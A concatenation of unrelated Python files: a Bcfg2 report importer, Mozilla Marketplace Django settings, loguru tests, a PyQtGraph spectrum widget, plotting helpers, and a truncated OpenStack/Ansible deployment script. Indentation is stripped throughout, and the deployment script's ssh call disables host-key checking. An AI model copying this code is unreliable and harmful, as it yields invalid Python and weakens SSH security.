sys.path.append(os.path.join(project_directory, '..'))
project_module = __import__(project_name, '', '', [''])
sys.path.pop()
# Set DJANGO_SETTINGS_MODULE appropriately.
os.environ['DJANGO_SETTINGS_MODULE'] = '%s.settings' % project_name
from Bcfg2.Server.Reports.reports.models import *
from lxml.etree import XML, XMLSyntaxError
from getopt import getopt, GetoptError
from datetime import datetime
from time import strptime
from django.db import connection
from Bcfg2.Server.Reports.updatefix import update_database
import logging
import Bcfg2.Logger
import platform
# Compatibility import
from Bcfg2.Bcfg2Py3k import ConfigParser
def build_reason_kwargs(r_ent, encoding, logger):
binary_file = False
sensitive_file = False
if r_ent.get('sensitive') in ['true', 'True']:
sensitive_file = True
rc_diff = ''
elif r_ent.get('current_bfile', False):
binary_file = True
rc_diff = r_ent.get('current_bfile')
if len(rc_diff) > 1024 * 1024:
rc_diff = ''
elif len(rc_diff) == 0:
# No point in flagging binary if we have no data
binary_file = False
elif r_ent.get('current_bdiff', False):
rc_diff = binascii.a2b_base64(r_ent.get('current_bdiff'))
elif r_ent.get('current_diff', False):
rc_diff = r_ent.get('current_diff')
else:
rc_diff = ''
if not binary_file:
try:
rc_diff = rc_diff.decode(encoding)
except:
logger.error("Reason isn't %s encoded, cannot decode it" % encoding)
rc_diff = ''
return dict(owner=r_ent.get('owner', default=""),
current_owner=r_ent.get('current_owner', default=""),
group=r_ent.get('group', default=""),
current_group=r_ent.get('current_group', default=""),
perms=r_ent.get('perms', default=""),
current_perms=r_ent.get('current_perms', default=""),
status=r_ent.get('status', default=""),
current_status=r_ent.get('current_status', default=""),
to=r_ent.get('to', default=""),
current_to=r_ent.get('current_to', default=""),
version=r_ent.get('version', default=""),
current_version=r_ent.get('current_version', default=""),
current_exists=r_ent.get('current_exists', default="True").capitalize() == "True",
current_diff=rc_diff,
is_binary=binary_file,
is_sensitive=sensitive_file)
def load_stats(cdata, sdata, encoding, vlevel, logger, quick=False, location=''):
clients = {}
[clients.__setitem__(c.name, c) \
for c in Client.objects.all()]
pingability = {}
[pingability.__setitem__(n.get('name'), n.get('pingable', default='N')) \
for n in cdata.findall('Client')]
for node in sdata.findall('Node'):
name = node.get('name')
c_inst, created = Client.objects.get_or_create(name=name)
if vlevel > 0:
logger.info("Client %s added to db" % name)
clients[name] = c_inst
try:
pingability[name]
except KeyError:
pingability[name] = 'N'
for statistics in node.findall('Statistics'):
timestamp = datetime(*strptime(statistics.get('time'))[0:6])
ilist = Interaction.objects.filter(client=c_inst,
timestamp=timestamp)
if ilist:
current_interaction = ilist[0]
if vlevel > 0:
logger.info("Interaction for %s at %s with id %s already exists" % \
(c_inst.id, timestamp, current_interaction.id))
continue
else:
newint = Interaction(client=c_inst,
timestamp=timestamp,
state=statistics.get('state',
default="unknown"),
repo_rev_code=statistics.get('revision',
default="unknown"),
client_version=statistics.get('client_version',
default="unknown"),
goodcount=statistics.get('good',
default="0"),
totalcount=statistics.get('total',
default="0"),
server=location)
newint.save()
current_interaction = newint
if vlevel > 0:
logger.info("Interaction for %s at %s with id %s INSERTED in to db" % (c_inst.id,
timestamp, current_interaction.id))
counter_fields = {TYPE_CHOICES[0]: 0,
TYPE_CHOICES[1]: 0,
TYPE_CHOICES[2]: 0}
pattern = [('Bad/*', TYPE_CHOICES[0]),
('Extra/*', TYPE_CHOICES[2]),
('Modified/*', TYPE_CHOICES[1])]
for (xpath, type) in pattern:
for x in statistics.findall(xpath):
counter_fields[type] = counter_fields[type] + 1
kargs = build_reason_kwargs(x, encoding, logger)
try:
rr = None
try:
rr = Reason.objects.filter(**kargs)[0]
except IndexError:
rr = Reason(**kargs)
rr.save()
if vlevel > 0:
logger.info("Created reason: %s" % rr.id)
except Exception:
ex = sys.exc_info()[1]
logger.error("Failed to create reason for %s: %s" % (x.get('name'), ex))
rr = Reason(current_exists=x.get('current_exists',
default="True").capitalize() == "True")
rr.save()
entry, created = Entries.objects.get_or_create(\
name=x.get('name'), kind=x.tag)
Entries_interactions(entry=entry, reason=rr,
interaction=current_interaction,
type=type[0]).save()
if vlevel > 0:
logger.info("%s interaction created with reason id %s and entry %s" % (xpath, rr.id, entry.id))
# Update interaction counters
current_interaction.bad_entries = counter_fields[TYPE_CHOICES[0]]
current_interaction.modified_entries = counter_fields[TYPE_CHOICES[1]]
current_interaction.extra_entries = counter_fields[TYPE_CHOICES[2]]
current_interaction.save()
mperfs = []
for times in statistics.findall('OpStamps'):
for metric, value in list(times.items()):
mmatch = []
if not quick:
mmatch = Performance.objects.filter(metric=metric, value=value)
if mmatch:
mperf = mmatch[0]
else:
mperf = Performance(metric=metric, value=value)
mperf.save()
mperfs.append(mperf)
current_interaction.performance_items.add(*mperfs)
for key in list(pingability.keys()):
if key not in clients:
continue
try:
pmatch = Ping.objects.filter(client=clients[key]).order_by('-endtime')[0]
if pmatch.status == pingability[key]:
pmatch.endtime = datetime.now()
pmatch.save()
continue
except IndexError:
pass
Ping(client=clients[key], status=pingability[key],
starttime=datetime.now(),
endtime=datetime.now()).save()
if vlevel > 1:
logger.info("---------------PINGDATA SYNCED---------------------")
#Clients are consistent
if __name__ == '__main__':
from sys import argv
verb = 0
cpath = "/etc/bcfg2.conf"
clientpath = False
statpath = False
syslog = False
try:
opts, args = getopt(argv[1:], "hvudc:s:CS", ["help",
"verbose",
"updates",
"debug",
"clients=",
"stats=",
"config=",
"syslog"])
except GetoptError:
mesg = sys.exc_info()[1]
# print help information and exit:
print("%s\nUsage:\nimportscript.py [-h] [-v] [-u] [-d] [-S] [-C bcfg2 config file] [-c clients-file] [-s statistics-file]" % (mesg))
raise SystemExit(2)
for o, a in opts:
if o in ("-h", "--help"):
print("Usage:\nimportscript.py [-h] [-v] -c <clients-file> -s <statistics-file> \n")
print("h : help; this message")
print("v : verbose; print messages on record insertion/skip")
print("u : updates; print status messages as items inserted semi-verbose")
print("d : debug; print most SQL used to manipulate database")
print("C : path to bcfg2.conf config file.")
print("c : clients.xml file")
print("s : statistics.xml file")
print("S : syslog; output to syslog")
raise SystemExit
if o in ["-C", "--config"]:
cpath = a
if o in ("-v", "--verbose"):
verb = 1
if o in ("-u", "--updates"):
verb = 2
if o in ("-d", "--debug"):
verb = 3
if o in ("-c", "--clients"):
clientspath = a
if o in ("-s", "--stats"):
statpath = a
if o in ("-S", "--syslog"):
syslog = True
logger = logging.getLogger('importscript.py')
logging.getLogger().setLevel(logging.INFO)
Bcfg2.Logger.setup_logging('importscript.py',
True,
syslog)
cf = ConfigParser.ConfigParser()
cf.read([cpath])
if not statpath:
try:
statpath = "%s/etc/statistics.xml" % cf.get('server', 'repository')
except (ConfigParser.NoSectionError, ConfigParser.NoOptionError):
print("Could not read bcfg2.conf; exiting")
raise SystemExit(1)
try:
statsdata = XML(open(statpath).read())
except (IOError, XMLSyntaxError):
print("StatReports: Failed to parse %s" % (statpath))
raise SystemExit(1)
try:
encoding = cf.get('components', 'encoding')
except:
encoding = 'UTF-8'
if not clientpath:
try:
clientspath = "%s/Metadata/clients.xml" % \
cf.get('server', 'repository')
except (ConfigParser.NoSectionError, ConfigParser.NoOptionError):
print("Could not read bcfg2.conf; exiting")
raise SystemExit(1)
try:
clientsdata = XML(open(clientspath).read())
except (IOError, XMLSyntaxError):
print("StatReports: Failed to parse %s" % (clientspath))
raise SystemExit(1)
q = '-O3' in sys.argv
# Be sure the database is ready for new schema
update_database()
load_stats(clientsdata,
statsdata,
encoding,
verb,
logger,
quick=q,
location=platform.node())
|
py | 7dfac6fb367649f51c0236b76d508a335570ece0 | """private_base will be populated from puppet and placed in this directory"""
import logging
import os
import dj_database_url
from mkt.settings import CACHE_PREFIX, ES_INDEXES, KNOWN_PROXIES, LOGGING
from .. import splitstrip
import private_base as private
ALLOWED_HOSTS = ['.allizom.org', '.mozflare.net']
ENGAGE_ROBOTS = False
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = private.EMAIL_HOST
DEBUG = False
TEMPLATE_DEBUG = DEBUG
DEBUG_PROPAGATE_EXCEPTIONS = False
SESSION_COOKIE_SECURE = True
REDIRECT_SECRET_KEY = private.REDIRECT_SECRET_KEY
ADMINS = ()
DATABASES = {}
DATABASES['default'] = dj_database_url.parse(private.DATABASES_DEFAULT_URL)
DATABASES['default']['ENGINE'] = 'mysql_pool'
DATABASES['default']['sa_pool_key'] = 'master'
DATABASES['default']['OPTIONS'] = {'init_command': 'SET storage_engine=InnoDB'}
DATABASES['slave'] = dj_database_url.parse(private.DATABASES_SLAVE_URL)
DATABASES['slave']['ENGINE'] = 'mysql_pool'
DATABASES['slave']['OPTIONS'] = {'init_command': 'SET storage_engine=InnoDB'}
DATABASES['slave']['sa_pool_key'] = 'slave'
SERVICES_DATABASE = dj_database_url.parse(private.SERVICES_DATABASE_URL)
DATABASE_POOL_ARGS = {
'max_overflow': 10,
'pool_size': 5,
'recycle': 30
}
SLAVE_DATABASES = ['slave']
CACHES = {
'default': {
'BACKEND': 'caching.backends.memcached.MemcachedCache',
# 'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
# 'BACKEND': 'memcachepool.cache.UMemcacheCache',
'LOCATION': splitstrip(private.CACHES_DEFAULT_LOCATION),
'TIMEOUT': 500,
'KEY_PREFIX': CACHE_PREFIX,
},
}
SECRET_KEY = private.SECRET_KEY
LOG_LEVEL = logging.DEBUG
## Celery
BROKER_URL = private.BROKER_URL
CELERY_ALWAYS_EAGER = True
CELERY_IGNORE_RESULT = True
CELERY_DISABLE_RATE_LIMITS = True
CELERYD_PREFETCH_MULTIPLIER = 1
NETAPP_STORAGE = private.NETAPP_STORAGE_ROOT + '/shared_storage'
MIRROR_STAGE_PATH = private.NETAPP_STORAGE_ROOT + '/public-staging'
GUARDED_ADDONS_PATH = private.NETAPP_STORAGE_ROOT + '/guarded-addons'
UPLOADS_PATH = NETAPP_STORAGE + '/uploads'
USERPICS_PATH = UPLOADS_PATH + '/userpics'
ADDON_ICONS_PATH = UPLOADS_PATH + '/addon_icons'
COLLECTIONS_ICON_PATH = UPLOADS_PATH + '/collection_icons'
IMAGEASSETS_PATH = UPLOADS_PATH + '/imageassets'
REVIEWER_ATTACHMENTS_PATH = UPLOADS_PATH + '/reviewer_attachment'
PREVIEWS_PATH = UPLOADS_PATH + '/previews'
SIGNED_APPS_PATH = NETAPP_STORAGE + '/signed_apps'
SIGNED_APPS_REVIEWER_PATH = NETAPP_STORAGE + '/signed_apps_reviewer'
PREVIEW_THUMBNAIL_PATH = PREVIEWS_PATH + '/thumbs/%s/%d.png'
PREVIEW_FULL_PATH = PREVIEWS_PATH + '/full/%s/%d.%s'
LOGGING['loggers'].update({
'z.task': { 'level': logging.DEBUG },
'z.redis': { 'level': logging.DEBUG },
'z.pool': { 'level': logging.ERROR },
})
REDIS_BACKEND = private.REDIS_BACKENDS_CACHE
REDIS_BACKENDS = {
'cache': private.REDIS_BACKENDS_CACHE,
'cache_slave': private.REDIS_BACKENDS_CACHE_SLAVE,
'master': private.REDIS_BACKENDS_MASTER,
'slave': private.REDIS_BACKENDS_SLAVE,
}
CACHE_MACHINE_USE_REDIS = True
TMP_PATH = os.path.join(NETAPP_STORAGE, 'tmp')
ADDONS_PATH = private.NETAPP_STORAGE_ROOT + '/files'
SPIDERMONKEY = '/usr/bin/tracemonkey'
csp = 'csp.middleware.CSPMiddleware'
RESPONSYS_ID = private.RESPONSYS_ID
CRONJOB_LOCK_PREFIX = 'mkt-landfill'
ES_HOSTS = splitstrip(private.ES_HOSTS)
ES_URLS = ['http://%s' % h for h in ES_HOSTS]
ES_INDEXES = dict((k, '%s_landfill' % v) for k, v in ES_INDEXES.items())
STATSD_HOST = private.STATSD_HOST
STATSD_PORT = private.STATSD_PORT
STATSD_PREFIX = private.STATSD_PREFIX
CEF_PRODUCT = STATSD_PREFIX
ES_TIMEOUT = 60
EXPOSE_VALIDATOR_TRACEBACKS = False
KNOWN_PROXIES += ['10.2.83.105',
'10.2.83.106',
'10.2.83.107',
'10.8.83.200',
'10.8.83.201',
'10.8.83.202',
'10.8.83.203',
'10.8.83.204',
'10.8.83.210',
'10.8.83.211',
'10.8.83.212',
'10.8.83.213',
'10.8.83.214',
'10.8.83.215',
'10.8.83.251',
'10.8.83.252',
'10.8.83.253',
]
NEW_FEATURES = True
REDIRECT_URL = 'https://outgoing.allizom.org/v1/'
CLEANCSS_BIN = 'cleancss'
LESS_BIN = 'lessc'
STYLUS_BIN = 'stylus'
UGLIFY_BIN = 'uglifyjs'
CELERYD_TASK_SOFT_TIME_LIMIT = 240
LESS_PREPROCESS = True
XSENDFILE_HEADER = 'X-Accel-Redirect'
ALLOW_SELF_REVIEWS = True
AES_KEYS = private.AES_KEYS
TASK_USER_ID = 4757633
SERVE_TMP_PATH = False
|
py | 7dfac83e482b7ced0eb5ecf18668d3bce31f8509 | import logging
from .conftest import make_logging_logger
from loguru import logger
class InterceptHandler(logging.Handler):
def emit(self, record):
# Get corresponding Loguru level if it exists
try:
level = logger.level(record.levelname).name
except ValueError:
level = record.levelno
# Find caller from where originated the logged message
frame, depth = logging.currentframe(), 2
while frame.f_code.co_filename == logging.__file__:
frame = frame.f_back
depth += 1
logger.opt(depth=depth, exception=record.exc_info).log(level, record.getMessage())
def test_formatting(writer):
fmt = "{name} - {file.name} - {function} - {level.name} - {level.no} - {line} - {module} - {message}"
expected = "tests.test_interception - test_interception.py - test_formatting - DEBUG - 10 - 31 - test_interception - This is the message\n"
with make_logging_logger("tests", InterceptHandler()) as logging_logger:
logger.add(writer, format=fmt)
logging_logger.debug("This is the %s", "message")
result = writer.read()
assert result == expected
def test_intercept(writer):
with make_logging_logger(None, InterceptHandler()) as logging_logger:
logging_logger.info("Nope")
logger.add(writer, format="{message}")
logging_logger.info("Test")
result = writer.read()
assert result == "Test\n"
def test_add_before_intercept(writer):
logger.add(writer, format="{message}")
with make_logging_logger(None, InterceptHandler()) as logging_logger:
logging_logger.info("Test")
result = writer.read()
assert result == "Test\n"
def test_remove_interception(writer):
h = InterceptHandler()
with make_logging_logger("foobar", h) as logging_logger:
logger.add(writer, format="{message}")
logging_logger.debug("1")
logging_logger.removeHandler(h)
logging_logger.debug("2")
result = writer.read()
assert result == "1\n"
def test_intercept_too_low(writer):
with make_logging_logger("tests.test_interception", InterceptHandler()):
logger.add(writer, format="{message}")
logging.getLogger("tests").error("Nope 1")
logging.getLogger("foobar").error("Nope 2")
result = writer.read()
assert result == ""
def test_multiple_intercept(writer):
with make_logging_logger("test_1", InterceptHandler()) as logging_logger_1:
with make_logging_logger("test_2", InterceptHandler()) as logging_logger_2:
logger.add(writer, format="{message}")
logging_logger_1.info("1")
logging_logger_2.info("2")
result = writer.read()
assert result == "1\n2\n"
def test_exception(writer):
with make_logging_logger("tests.test_interception", InterceptHandler()) as logging_logger:
logger.add(writer, format="{message}")
try:
1 / 0
except:
logging_logger.exception("Oops...")
lines = writer.read().strip().splitlines()
assert lines[0] == "Oops..."
assert lines[-1] == "ZeroDivisionError: division by zero"
assert sum(line.startswith("> ") for line in lines) == 1
def test_level_is_no(writer):
with make_logging_logger("tests", InterceptHandler()) as logging_logger:
logger.add(writer, format="<lvl>{level.no} - {level.name} - {message}</lvl>", colorize=True)
logging_logger.log(12, "Hop")
result = writer.read()
assert result == "12 - Level 12 - Hop\x1b[0m\n"
def test_level_does_not_exist(writer):
logging.addLevelName(152, "FANCY_LEVEL")
with make_logging_logger("tests", InterceptHandler()) as logging_logger:
logger.add(writer, format="<lvl>{level.no} - {level.name} - {message}</lvl>", colorize=True)
logging_logger.log(152, "Nop")
result = writer.read()
assert result == "152 - Level 152 - Nop\x1b[0m\n"
def test_level_exist_builtin(writer):
with make_logging_logger("tests", InterceptHandler()) as logging_logger:
logger.add(writer, format="<lvl>{level.no} - {level.name} - {message}</lvl>", colorize=True)
logging_logger.error("Error...")
result = writer.read()
assert result == "\x1b[31m\x1b[1m40 - ERROR - Error...\x1b[0m\n"
def test_level_exists_custom(writer):
logging.addLevelName(99, "ANOTHER_FANCY_LEVEL")
logger.level("ANOTHER_FANCY_LEVEL", no=99, color="<green>", icon="")
with make_logging_logger("tests", InterceptHandler()) as logging_logger:
logger.add(writer, format="<lvl>{level.no} - {level.name} - {message}</lvl>", colorize=True)
logging_logger.log(99, "Yep!")
result = writer.read()
assert result == "\x1b[32m99 - ANOTHER_FANCY_LEVEL - Yep!\x1b[0m\n"
def test_using_logging_function(writer):
with make_logging_logger(None, InterceptHandler()):
logger.add(writer, format="{function} {line} {module} {file.name} {message}")
logging.warning("ABC")
result = writer.read()
assert result == "test_using_logging_function 150 test_interception test_interception.py ABC\n"
|
py | 7dfac8bba23f9c83a5808d8ae4be3dee8fb6a453 | from collections import namedtuple
import numpy as np
import pyqtgraph as pg
from PyQt5.QtCore import Qt
from pyqtgraph import PlotWidget
# structure for annotation (here for reference)
PeakAnnoStruct = namedtuple(
"PeakAnnoStruct",
"mz intensity text_label \
symbol symbol_color",
)
LadderAnnoStruct = namedtuple(
"LadderAnnoStruct",
"mz_list \
text_label_list color",
)
pg.setConfigOption("background", "w") # white background
pg.setConfigOption("foreground", "k") # black peaks
class SpectrumWidget(PlotWidget):
def __init__(self, parent=None, dpi=100):
PlotWidget.__init__(self)
self.setLimits(yMin=0, xMin=0)
self.setMouseEnabled(y=False)
self.setLabel("bottom", "m/z")
self.setLabel("left", "intensity")
self.highlighted_peak_label = None
self.peak_annotations = None
self.ladder_annotations = None
# numpy arrays for fast look-up
self._mzs = np.array([])
self._ints = np.array([])
self.getViewBox().sigXRangeChanged.connect(self._autoscaleYAxis)
self.getViewBox().sigRangeChangedManually.connect(
self.redrawLadderAnnotations
) # redraw anno
self.proxy = pg.SignalProxy(
self.scene().sigMouseMoved, rateLimit=60, slot=self._onMouseMoved
)
def setSpectrum(
self, spectrum, zoomToFullRange=False
): # add a default value for displaying all peaks
self.plot(clear=True)
self.zoomToFullRange = zoomToFullRange # relevant in redrawPlot()
# delete old highlighte "hover" peak
"""se_comment: changed != to is not"""
if self.highlighted_peak_label is not None:
self.removeItem(self.highlighted_peak_label)
self.highlighted_peak_label = None
self.spec = spectrum
self._mzs, self._ints = self.spec.get_peaks()
self._autoscaleYAxis()
# for annotation in ControllerWidget
self.minMZ = np.amin(self._mzs)
self.maxMZ = np.amax(self._mzs)
self.redrawPlot()
def setPeakAnnotations(self, p_annotations):
self.peak_annotation_list = p_annotations
def setLadderAnnotations(self, ladder_visible=[]):
self._ladder_visible = ladder_visible # LadderAnnoStruct
def clearLadderAnnotation(self, ladder_key_to_clear):
try:
if ladder_key_to_clear in self._ladder_anno_lines.keys():
self._clear_ladder_item(ladder_key_to_clear)
except (AttributeError, NameError):
return
def redrawPlot(self):
self.plot(clear=True)
if self.zoomToFullRange:
self.setXRange(self.minMZ, self.maxMZ)
self._plot_spectrum()
self._clear_annotations()
self._plot_peak_annotations()
self._plot_ladder_annotations()
def redrawLadderAnnotations(self):
self._plot_ladder_annotations()
def _autoscaleYAxis(self):
x_range = self.getAxis("bottom").range
if x_range == [
0,
1,
]: # workaround for axis sometimes not being set
# TODO: check if this is resovled
x_range = [np.amin(self._mzs), np.amax(self._mzs)]
self.currMaxY = self._getMaxIntensityInRange(x_range)
if self.currMaxY:
self.setYRange(0, self.currMaxY, update=False)
def _plot_peak_annotations(self):
try:
self.peak_annotation_list
except (AttributeError, NameError):
return
if self.peak_annotation_list is not None:
for item in self.peak_annotation_list: # item : PeakAnnoStruct
self.plot(
[item.mz],
[item.intensity],
symbol=item.symbol,
symbolBrush=pg.mkBrush(item.symbol_color),
symbolSize=14,
)
if item.text_label:
label = pg.TextItem(
text=item.text_label, color=item.symbol_color, anchor=(
0.5, 1)
)
self.addItem(label)
label.setPos(item.mz, item.intensity)
def _getMaxIntensityInRange(self, xrange):
left = np.searchsorted(self._mzs, xrange[0], side="left")
right = np.searchsorted(self._mzs, xrange[1], side="right")
return np.amax(self._ints[left:right], initial=1)
def _plot_spectrum(self):
bargraph = pg.BarGraphItem(x=self._mzs, height=self._ints, width=0)
self.addItem(bargraph)
def _plot_ladder_annotations(self):
try:
self._ladder_visible
except (AttributeError, NameError):
return
try:
self.currMaxY
except (AttributeError, NameError):
self.currMaxY = self._getMaxIntensityInRange(
self.getAxis("bottom").range)
xlimit = [self._mzs[0], self._mzs[-1]]
for ladder_key, lastruct in self._ladder_visible.items():
if ladder_key in self._ladder_anno_lines.keys(): # update
self._ladder_anno_lines[ladder_key][0].setData(
[xlimit[0], xlimit[1]], [self.currMaxY, self.currMaxY]
) # horizontal line
cntr = 0
for x in lastruct.mz_list:
self._ladder_anno_lines[ladder_key][cntr + 1].setData(
[x, x], [0, self.currMaxY]
)
self._ladder_anno_labels[ladder_key][cntr].setPos(
x, self.currMaxY
) # horizon line doesn't have label
cntr += 1
else: # plot
pen = pg.mkPen(lastruct.color, width=2, style=Qt.DotLine)
self._ladder_anno_lines[ladder_key] = []
self._ladder_anno_labels[ladder_key] = []
self._ladder_anno_lines[ladder_key].append(
# horizon line. index 0
self.plot(
[xlimit[0], xlimit[1]], [
self.currMaxY, self.currMaxY], pen=pen
)
)
"""se_comment: hard-refactor to comply to pep8"""
z = zip(lastruct.mz_list, lastruct.text_label_list)
for x, txt_label in z:
self._ladder_anno_lines[ladder_key].append(
self.plot([x, x], [0, self.currMaxY], pen=pen)
)
label = pg.TextItem(
text=txt_label, color=lastruct.color, anchor=(1, -1)
)
label.setPos(x, self.currMaxY)
label.setParentItem(
self._ladder_anno_lines[ladder_key][-1])
self._ladder_anno_labels[ladder_key].append(label)
def _clear_annotations(self):
self._ladder_visible = dict()
self._ladder_anno_lines = dict()
self._ladder_anno_labels = dict()
def _clear_peak_annotations(self):
self.peak_annotation_list = None
def _clear_ladder_item(self, key):
for anno in self._ladder_anno_lines[key]:
anno.clear()
for pos in self._ladder_anno_labels[key]:
pos.setPos(0, 0)
del self._ladder_anno_lines[key]
del self._ladder_anno_labels[key]
def _onMouseMoved(self, evt):
pos = evt[0] # using signal proxy
# turns original arguments into a tuple
if self.sceneBoundingRect().contains(pos):
mouse_point = self.getViewBox().mapSceneToView(pos)
pixel_width = self.getViewBox().viewPixelSize()[0]
left = np.searchsorted(
self._mzs, mouse_point.x() - 4.0 * pixel_width, side="left"
)
right = np.searchsorted(
self._mzs, mouse_point.x() + 4.0 * pixel_width, side="right"
)
if left == right: # none found -> remove text
"""se_comment: changed != to is not"""
if self.highlighted_peak_label is not None:
self.highlighted_peak_label.setText("")
return
# get point in range with minimum squared distance
dx = np.square(np.subtract(self._mzs[left:right], mouse_point.x()))
dy = np.square(np.subtract(
self._ints[left:right], mouse_point.y()))
idx_max_int_in_range = np.argmin(np.add(dx, dy))
x = self._mzs[left + idx_max_int_in_range]
y = self._ints[left + idx_max_int_in_range]
"""se_comment: changed == to is"""
if self.highlighted_peak_label is None:
self.highlighted_peak_label = pg.TextItem(
text="{0:.3f}".format(x),
color=(100, 100, 100),
anchor=(0.5, 1.5)
)
self.addItem(
self.highlighted_peak_label, ignoreBounds=True
) # ignore bounds to prevent rescaling of axis
# if the text item touches the border
self.highlighted_peak_label.setText("{0:.3f}".format(x))
self.highlighted_peak_label.setPos(x, y)
else:
# mouse moved out of visible area: remove highlighting item
"""se_comment: changed != to is not"""
if self.highlighted_peak_label is not None:
self.highlighted_peak_label.setText("")
|
py | 7dfac9683385d3f1a282acb069c1b85bab75b3bf | import pylab as pl
import pdb
def plot_scattered_data(x, y, z, nx=100, ny=100, plot_dots=True):
'''
plots 2d data.
x, y : coordinate
z : data value
based on scipy cookbook (http://www.scipy.org/Cookbook/Matplotlib/Gridding_irregularly_spaced_data)
'''
import numpy as np
from matplotlib.mlab import griddata
import matplotlib.pyplot as plt
import numpy.ma as ma
from numpy.random import uniform
# make up some randomly distributed data
# define grid.
xi = np.linspace(x.min(), x.max(), nx)
yi = np.linspace(y.min(), y.max(), ny)
# grid the data.
zi = griddata(x,y,z,xi,yi)
#
# contour the gridded data, plotting dots at the randomly spaced data points.
plt.contour(xi,yi,zi,15,linewidths=0.5,colors='k')
plt.contourf(xi,yi,zi,15,cmap=plt.cm.jet)
plt.colorbar() # draw colorbar
# plot data points.
if plot_dots: plt.scatter(x,y,marker='o',c='b',s=5)
#plt.xlim(x.min(), x.max())
#plt.ylim(y.min(), y.max())
plt.show()
def contourf(x, y, z, zmin=None, zmax=None, fig=None, nlvls=20, **kwargs):
'''
Make contourplot with a useful colormap scaled to zmin, zmax
Based on http://bytes.com/topic/python/answers/891999-matplotlib-colorbar-scale-problem
Ex:
ax = PU.contourf(t, x, z/maxval, 0., 1.)
setp(ax, 'xlabel', 'TIME')
setp(ax, 'ylabel', 'MD')
setp(ax, 'title', '%s %s (relative)' % (frftfile.split('.')[0], varnm))
'''
if fig is None: fig = pl.figure()
if zmin is None: zmin = z.ravel().min()
if zmax is None: zmax = z.ravel().max()
fig.clf()
norm = pl.Normalize(vmin=zmin, vmax=zmax)
#
# plot contours
ax1 = fig.add_axes([0.11, 0.09, 0.73, 0.81], kwargs) # kwargs does not seem to work
pl.plt.contourf(x, y, z, nlvls, norm=norm)
pl.plt.contourf(x, y, z, nlvls, norm=norm) # plotting twice to avoid contourlines. bug??
pl.axis((x[0], x[-1], y[0], y[-1])) # not sure why this is necessary
#
# plot colorbar
ax2 = fig.add_axes([0.86, 0.09, 0.06, 0.81])
pl.mpl.colorbar.ColorbarBase(ax2, norm=norm, orientation='vertical')
#
return ax1
def contours(z, zmin=None, zmax=None, fig=None, nlvls=20):
x = pl.arange(z.shape[0])
y = pl.arange(z.shape[1])
return contourf(x, y, z.T, zmin=zmin, zmax=zmax, fig=fig, nlvls=nlvls)
|
py | 7dfac9dad8669f9475d9948765d14a9e6231891a | # Copyright (c) 2014 Alcatel-Lucent Enterprise
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import time, os, sys
try:
import yaml
except:
print "Module yaml not found !"
print "sudo pip install pyyaml"
sys.exit(1)
try:
import novaclient.client, cinderclient.client
except:
print "Module nova and/or cinder not found !"
print "sudo pip install python-novaclient"
print "sudo pip install python-cinderclient"
sys.exit(1)
try:
from neutronclient.v2_0 import client as neutronClient
except:
print "sudo pip install python-neutronclient"
sys.exit(1)
try:
import ansible.playbook
from ansible import callbacks
from ansible import utils
except:
print "Module ansible not found !"
print "sudo pip install ansible"
sys.exit(1)
# Used for ansible inventory
import ConfigParser
import subprocess
import shlex
# Used for playbooks stdout
from threading import Thread
class CommandExecutor:
def __init__(self, verbose):
self.verbose = verbose
def command(self, cmd, async=False, environment=None):
to_execute = cmd
env = os.environ.copy()
if environment:
env.update(environment)
if self.verbose:
print env
print ">>"+to_execute
if async:
return subprocess.Popen(shlex.split(to_execute), stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=env, universal_newlines=True)
else:
return subprocess.call(shlex.split(to_execute), stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=env, universal_newlines=True)
def isRunning(self, p):
return p.poll() is None
class Volume:
def __init__(self, name, size):
self.name = name
self.size = size
class InstanceEvents:
def onVMCreated(self, instance):
pass
def onVMActive(self, instance):
pass
def onVMReady(self, instance):
pass
def onVMDeleted(self, instance):
pass
class Instance:
def __init__(self, name, flavor, ansible_sections, playbook_file, volumes, floating_ips, vips, additional_security_groups, dependencies, nova, cinder, neutron, image, networks, ssh_key_name, ssh_user, ssh_key, cmdExe, static, groups):
self.name = name
self.flavor = flavor
self.ansible_sections = ansible_sections
self.playbook_file = playbook_file
self.volumes = volumes
self.floating_ips = floating_ips
self.vips = vips
self.additional_security_groups = additional_security_groups
self.dependencies = dependencies
self.nova = nova
self.cinder = cinder
self.neutron = neutron
self.image = image
self.networks = networks
self.ssh_key_name = ssh_key_name
self.ssh_key = ssh_key
self.ssh_user = ssh_user
self.cmdExe = cmdExe
self.vm = None
self.deploy_dependencies = []
self.callbacks = []
self.status = "Unavailable"
self.static = static
self.groups = groups
self.checkReady = False
def updateVM(self, vm):
previous_vm = self.vm
self.vm = vm
if vm:
if not previous_vm:
self.status = "Created"
for c in self.callbacks:
c.onVMCreated(self)
if self.status == "Created":
if self.vm.status == "ACTIVE":
self.status = "Active"
for c in self.callbacks:
c.onVMActive(self)
if self.vm.status == "ACTIVE" and not self.status == "Ready" and self.checkReady:
if self.cmdExe.command("ssh -o LogLevel=quiet -o ConnectTimeout=2 -o StrictHostKeychecking=no -o UserKnownHostsFile=/dev/null -i " + self.ssh_key.replace(" ", "\ ") + " " + self.ssh_user + "@" + self.getIPAddress() + " \"ls && ! pgrep apt-get\"") == 0:
self.status = "Ready"
for c in self.callbacks:
c.onVMReady(self)
else:
if previous_vm:
self.status = "Deleted"
for c in self.callbacks:
c.onVMDeleted(self)
def getPortId(self, ip):
ports = self.neutron.list_ports()
for k in ports["ports"]:
if (k["fixed_ips"][0]["ip_address"] == ip):
return k["id"]
def getFloatingIpId(self, ip):
floatingips = self.neutron.list_floatingips()
for k in floatingips["floatingips"]:
if k["floating_ip_address"] == ip:
return k["id"]
def getNetworkId(self, name):
networks = self.neutron.list_networks()
for k in networks["networks"]:
if k["name"] == name:
return k["id"]
def getIPAddress(self, net=0):
if self.vm and self.vm.status == "ACTIVE" and self.vm.networks.has_key(self.networks[net]):
return self.vm.networks[self.networks[net]][0]
return None
def getSecurityGroupId(self, name):
list = self.nova.security_groups.list()
i = 0
for k in list:
if k.name == name:
return k.id
i = i + 1
return None
def delete(self):
